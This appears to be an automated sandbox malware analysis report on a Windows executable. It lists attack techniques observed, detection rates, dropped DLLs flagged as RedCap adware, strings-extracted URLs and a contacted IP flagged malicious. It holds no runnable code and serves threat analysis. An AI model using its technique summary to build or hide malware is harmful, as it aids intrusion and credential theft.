| Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 12 Registry Run Keys / Startup Folder | 1 Windows Service | 2 Obfuscated Files or Information | Security Account Manager | 48 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | Steganography | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | 3 PowerShell | Login Hook | 12 Process Injection | 1 Software Packing | NTDS | 241 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 3 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 121 Masquerading | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior Graph: ID 1570242, Sample YoS6ZBCcUy.exe, Startdate 06/12/2024, Architecture WINDOWS, Score 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| YoS6ZBCcUy.exe | 17% | ReversingLabs | Win32.Trojan.Generic | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Programs\NSIS\d3dcompiler_47.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Programs\NSIS\ffmpeg.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Programs\NSIS\libEGL.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Programs\NSIS\libGLESv2.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dll | 62% | ReversingLabs | Win32.Adware.RedCap | |
| C:\Users\user\AppData\Local\Temp\234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll | 16% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll | 16% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\8e6f904c-93b6-4e7c-b442-119a15f71127.tmp.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll | 62% | ReversingLabs | Win32.Adware.RedCap | |
| C:\Users\user\AppData\Local\Temp\b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll | 16% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\NSIS.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\d3dcompiler_47.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\ffmpeg.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libEGL.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libGLESv2.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\resources\elevate.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vk_swiftshader.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vulkan-1.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\SpiderBanner.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\System.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsExec.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsis7z.dll | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Roaming\MyElectronApp\version.dll | 62% | ReversingLabs | Win32.Adware.RedCap | |
| C:\Windows \System32\version.dll | 16% | ReversingLabs | | |
| C:\Windows \System32\winSAT.exe | 0% | ReversingLabs | | |
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://console.spec.whatwg.org/#table | 0% | Avira URL Cloud | safe | |
| https://url.spec.whatwg.org/#concept-urlencoded-serializer | 0% | Avira URL Cloud | safe | |
| https://encoding.spec.whatwg.org/#textencoder | 0% | Avira URL Cloud | safe | |
| http://www.midnight-commander.org/browser/lib/tty/key.c | 0% | Avira URL Cloud | safe | |
| https://url.spec.whatwg.org/#concept-url-origin | 0% | Avira URL Cloud | safe | |
| https://sizzlejs.com/ | 0% | Avira URL Cloud | safe | |
| http://fresc81.github.io/node-winreg | 0% | Avira URL Cloud | safe | |
| https://heycam.github.io/webidl/#es-iterable-entries | 0% | Avira URL Cloud | safe | |
| https://heycam.github.io/webidl/#es-interfaces | 0% | Avira URL Cloud | safe | |
| https://tc39.github.io/ecma262/#sec-object.prototype.tostring | 0% | Avira URL Cloud | safe | |
| https://heycam.github.io/webidl/#dfn-iterator-prototype-object | 0% | Avira URL Cloud | safe | |
| https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval | 0% | Avira URL Cloud | safe | |
| https://sindresorhus.com | 0% | Avira URL Cloud | safe | |
| https://fetch.spec.whatwg.org/#fetch-method | 0% | Avira URL Cloud | safe | |
| https://url.spec.whatwg.org/#urlsearchparams | 0% | Avira URL Cloud | safe | |
| https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object | 0% | Avira URL Cloud | safe | |
| https://www.ecma-international.org/ecma-262/#sec-line-terminators | 0% | Avira URL Cloud | safe | |
No contacted domains info
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://github.com/lgeiger/node-abi/issues/54 | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://github.com/mcollina/reusify#readme | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://url.spec.whatwg.org/#concept-url-origin | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://github.com/simplejson/simplejson | YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://tools.ietf.org/html/rfc6455#section-1.3 | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://github.com/prebuild/prebuild-install | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://github.com/vercel/pkg-fetch/actions/runs/2638965835 | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://github.com/jesec/pkg-fetch/actions/runs/2639072106 | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://github.com/feross/queue-microtask | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://console.spec.whatwg.org/#table | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://github.com/nodejs/string_decoder | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://secure.travis-ci.org/troygoode/node-require-directory.png) | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://encoding.spec.whatwg.org/#textencoder | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://www.patreon.com/feross | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
| https://github.com/tc39/proposal-weakrefs | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | | high |
                          https://goo.gl/t5IS6M).YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            https://github.com/vercel/pkg-fetch/actions/runs/2638965968YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                              high
                              https://github.com/nodejs/node/issues/44985YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.jsYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  high
                                  https://url.spec.whatwg.org/#concept-urlencoded-serializerYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://url.spec.whatwg.org/#dom-urlsearchparams-urlsearchparamsYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    high
                                    https://yargs.js.org/YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://semver.org/YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/google/pprof/tree/master/protoYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/jrmuizel/qcms/tree/v4YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://nodejs.org/api/fs.htmlYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://npmjs.org/package/require-directory))YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://chromium.googlesource.com/chromium/src/YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2078169826.00000000069A3000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.midnight-commander.org/browser/lib/tty/key.cYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://nodejs.org/YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://tools.ietf.org/html/rfc7540#section-8.1.2.5YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/tensorflow/modelsYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/KhronosGroup/SPIRV-Headers.gitYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://tc39.es/ecma262/#sec-timeclipYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            https://nodei.co/npm/require-directory/)YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              https://github.com/nodejs/node/pull/33661YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWithYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/tensorflow/tflite-supportYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://github.com/WICG/scheduling-apisYoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/nodejs/node/pull/48477#issuecomment-1604586650YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://pypi.org/project/pyparsingYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://sqlite.org/YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://code.google.com/p/v8/wiki/JavaScriptStackTraceApiYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://code.google.com/p/chromium/issues/detail?id=25916YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://webidl.spec.whatwg.org/#abstract-opdef-converttointYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.opensource.org/licenses/mit-license.php)YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://stackoverflow.com/a/1068308/13216YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://github.com/jesec/pkg-fetch/actions/runs/2639072371YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://twitter.com/intent/user?screen_name=troygoode)YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://fetch.spec.whatwg.org/#fetch-timing-infoYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://html.spec.whatwg.org/multipage/server-sent-events.html#server-sent-events.org/YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.com/libuv/libuv/pull/1088YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/nodejs/node/pull/12607YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://tukaani.org/xz/&gt;.YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope.YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.ecma-international.org/ecma-262/#sec-line-terminatorsYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://fresc81.github.io/node-winregYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://sizzlejs.com/YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://medium.com/YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.portaudio.comYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/ChromeDevTools/devtools-frontend/blob/4275917f84266ef40613db3c1784a25f902ea74e/frYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.unicode.org/copyright.htmlYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/inspect-js/node-supports-preserve-symlinks-flag.gitYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://github.com/vercel/pkg-fetch/actions/runs/2068735040YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/vercel/pkg-fetch/actions/runs/752615557YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://github.com/RyanZim/universalify.gitYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://w3c.github.io/aria/#aria-hidden.YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://developer.chrome.com/docs/extensions/mv3/cross-origin-isolation/.YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/google/shell-encryptionYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://heycam.github.io/webidl/#es-iterable-entriesYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://github.com/wasdk/wasmparserYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://heycam.github.io/webidl/#es-interfacesYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://unpkg.com/cliuiYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/nodejs/node/issuesYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/denoland/deno/blob/main/LICENSE.md.YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://encoding.spec.whatwg.org/#encode-and-enqueue-a-chunkYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://tc39.github.io/ecma262/#sec-object.prototype.tostringYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://url.spec.whatwg.org/#urlsearchparamsYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://github.com/dpranke/typ.gitYoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://github.com/nodejs/node/issues/8987YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/vercel/pkg-fetch/actions/runs/752615423YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://streams.spec.whatwg.org/#example-manual-write-with-backpressureYoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/nodejs/node/pull/30380#issuecomment-552948364YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setintervalYoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://www.khronos.org/registry/YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://juliangruber.comYoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        high
https://github.com/sponsors/feross | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://heycam.github.io/webidl/#dfn-iterator-prototype-object | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://datatracker.ietf.org/doc/html/rfc7238 | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/nodejs/node/pull/38614) | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://github.com/nodejs/node/issues/10673 | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://xhr.spec.whatwg.org/. | YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/nodejs/node/issues/19009 | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://sindresorhus.com | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fetch.spec.whatwg.org/#fetch-method | YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pypi.python.org/pypi/pyfakefs | YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/mafintosh/tar-stream.git | YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.42.12.39 | unknown | Russian Federation | 56784 | MULTIHOST-ASRU | true
                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                        Analysis ID:1570242
                                                                                                                                                                        Start date and time:2024-12-06 17:32:19 +01:00
                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 13m 42s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:full
                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                        Number of analysed new started processes analysed:52
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:1
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • AMSI enabled
